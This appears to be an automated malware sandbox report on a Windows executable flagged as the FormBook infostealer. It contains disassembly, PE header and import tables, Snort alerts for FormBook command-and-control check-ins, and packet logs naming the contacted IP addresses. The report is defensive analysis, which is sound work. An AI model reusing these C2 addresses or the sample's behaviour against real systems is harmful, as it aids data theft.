                                                                                                                  mov dword ptr [esp+14h], 00409168h
                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                  mov byte ptr [esp+18h], 00000020h
                                                                                                                  call dword ptr [004070B0h]
                                                                                                                  call dword ptr [004070ACh]
                                                                                                                  cmp ax, 00000006h
                                                                                                                  je 00007FD268D34AA3h
                                                                                                                  push ebx
                                                                                                                  call 00007FD268D37884h
                                                                                                                  cmp eax, ebx
                                                                                                                  je 00007FD268D34A99h
                                                                                                                  push 00000C00h
                                                                                                                  call eax
                                                                                                                  mov esi, 00407280h
                                                                                                                  push esi
                                                                                                                  call 00007FD268D37800h
                                                                                                                  push esi
                                                                                                                  call dword ptr [00407108h]
                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                  jne 00007FD268D34A7Dh
                                                                                                                  push 0000000Dh
                                                                                                                  call 00007FD268D37858h
                                                                                                                  push 0000000Bh
                                                                                                                  call 00007FD268D37851h
                                                                                                                  mov dword ptr [00423F44h], eax
                                                                                                                  call dword ptr [00407038h]
                                                                                                                  push ebx
                                                                                                                  call dword ptr [0040726Ch]
                                                                                                                  mov dword ptr [00423FF8h], eax
                                                                                                                  push ebx
                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                  push 00000160h
                                                                                                                  push eax
                                                                                                                  push ebx
                                                                                                                  push 0041F4F0h
                                                                                                                  call dword ptr [0040715Ch]
                                                                                                                  push 0040915Ch
                                                                                                                  push 00423740h
                                                                                                                  call 00007FD268D37484h
                                                                                                                  call dword ptr [0040710Ch]
                                                                                                                  mov ebp, 0042A000h
                                                                                                                  push eax
                                                                                                                  push ebp
                                                                                                                  call 00007FD268D37472h
                                                                                                                  push ebx
                                                                                                                  call dword ptr [00407144h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc80.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                  .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x2d0000xc800xe00False0.412109375data4.00712910454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_ICON0x2d1d80x2e8dataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d4c00x100dataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d5c00x11cdataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d6e00x60dataEnglishUnited States
                                                                                                                  RT_GROUP_ICON0x2d7400x14dataEnglishUnited States
                                                                                                                  RT_VERSION0x2d7580x254data
                                                                                                                  RT_MANIFEST0x2d9b00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                  USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                  ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                  Version Infos

                                                                                                                  DescriptionData
                                                                                                                  LegalCopyrightlieutenant
                                                                                                                  FileVersion9.7.6.5
                                                                                                                  CompanyNamestone
                                                                                                                  LegalTrademarksapologizes
                                                                                                                  Commentsfirearms
                                                                                                                  ProductNamegrandeur
                                                                                                                  FileDescriptionundoubtedly
                                                                                                                  Translation0x0000 0x04e4

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  06/22/21-18:25:23.221652TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:23.221652TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:23.221652TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:28.712452TCP1201ATTACK-RESPONSES 403 Forbidden8049743185.53.177.12192.168.2.5
                                                                                                                  06/22/21-18:25:50.296525TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:50.296525TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:50.296525TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:55.696207TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:25:55.696207TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:25:55.696207TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:26:06.571907TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.5
                                                                                                                  06/22/21-18:26:27.789250TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89
                                                                                                                  06/22/21-18:26:27.789250TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89
                                                                                                                  06/22/21-18:26:27.789250TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 22, 2021 18:25:11.219217062 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.418889046 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.419002056 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.419150114 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.618474007 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619210958 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619240999 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619385004 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.619438887 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.820360899 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.240540981 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.505656004 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.506846905 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.506963015 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.773952961 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774080992 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774117947 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774319887 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.774372101 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:18.038943052 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.178512096 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.221335888 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.221569061 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.221652031 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.264619112 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.498655081 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.498703957 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.498946905 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.498977900 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.524998903 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.526283979 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.541776896 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.585988998 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.627732038 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.627933025 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.669863939 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.670067072 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.712395906 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712451935 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712490082 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712666035 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.712698936 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.754615068 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.816914082 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.868442059 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.868536949 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.868663073 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.919959068 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017278910 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017316103 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017632961 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:34.017674923 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:34.069250107 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.579380035 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.760284901 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.760457993 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.760615110 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.941190004 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.979393005 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.979692936 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.980089903 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.980204105 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:45.160393000 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.065499067 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.296199083 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.296382904 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.296525002 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.530720949 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.531052113 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.761837959 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.761857986 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.762094021 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:55.638763905 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.695979118 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.696079969 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.696207047 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754239082 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754271030 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754472017 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754544973 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.811793089 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:00.855860949 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.056698084 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.056828022 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.057169914 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.257514954 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285360098 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285407066 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285660982 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.286010981 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.486409903 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.386672974 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429472923 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.429666996 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429832935 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.474116087 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571907043 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571934938 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.572149992 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.572212934 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.879861116 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.922709942 CEST804975334.102.136.180192.168.2.5

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 22, 2021 18:23:54.764163017 CEST6530753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:54.812222958 CEST6434453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:54.823451996 CEST53653078.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:54.892064095 CEST53643448.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.027213097 CEST6206053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.041273117 CEST6180553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.094613075 CEST53618058.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.095175982 CEST53620608.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.235524893 CEST5479553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.286159039 CEST53547958.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.665152073 CEST4955753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.716680050 CEST53495578.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:56.582766056 CEST6173353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:56.640352964 CEST53617338.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:57.512614012 CEST6544753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:57.571700096 CEST53654478.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:57.823247910 CEST5244153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:57.884458065 CEST53524418.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:58.493119001 CEST6217653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:58.545609951 CEST53621768.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:59.475248098 CEST5959653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:59.531183004 CEST53595968.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:00.639548063 CEST6529653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:00.691658020 CEST53652968.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:01.593386889 CEST6318353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:01.653599977 CEST53631838.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:02.567322016 CEST6015153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:02.619290113 CEST53601518.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:03.765702009 CEST5696953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:03.819284916 CEST53569698.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:04.694814920 CEST5516153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:04.745690107 CEST53551618.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:05.693505049 CEST5475753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:05.750416040 CEST53547578.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:21.213641882 CEST4999253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:21.274754047 CEST53499928.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:35.263587952 CEST6007553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:35.319888115 CEST53600758.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:51.343915939 CEST5501653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:51.405790091 CEST53550168.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:05.819411039 CEST6434553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:05.889704943 CEST53643458.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:10.909509897 CEST5712853192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST53571288.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:12.875679016 CEST5479153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:12.937540054 CEST53547918.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:16.629293919 CEST5046353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:17.239247084 CEST53504638.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.113866091 CEST5039453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.120426893 CEST5853053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.174793005 CEST53503948.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.189177990 CEST53585308.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.917556047 CEST5381353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.979103088 CEST53538138.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:22.652049065 CEST6373253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:22.720386028 CEST53637328.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:22.827163935 CEST5734453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST53573448.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.446938992 CEST5445053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:23.506237030 CEST53544508.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:24.219727993 CEST5926153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:24.281904936 CEST53592618.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:25.119163036 CEST5715153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:25.182950974 CEST53571518.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:26.132370949 CEST5941353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:26.194438934 CEST53594138.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:27.594022989 CEST6051653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:27.647409916 CEST53605168.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.505049944 CEST5164953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:28.584403992 CEST53516498.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.982712984 CEST6508653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:29.044420004 CEST53650868.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:29.632641077 CEST5643253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:29.692975044 CEST53564328.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.726090908 CEST5292953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST53529298.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:36.458223104 CEST6431753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:36.520037889 CEST53643178.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:39.055846930 CEST6100453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:39.366209030 CEST53610048.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:39.867213011 CEST5689553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:39.925975084 CEST53568958.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.382913113 CEST6237253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST53623728.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:49.992361069 CEST6151553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:50.063656092 CEST53615158.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.564214945 CEST5667553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:55.637794018 CEST53566758.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:00.782303095 CEST5717253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST53571728.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.311050892 CEST5526753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST53552678.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:11.586018085 CEST5096953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:11.956522942 CEST53509698.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:17.334999084 CEST6436253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:17.406371117 CEST53643628.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:27.430978060 CEST5476653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:27.493675947 CEST53547668.8.8.8192.168.2.5
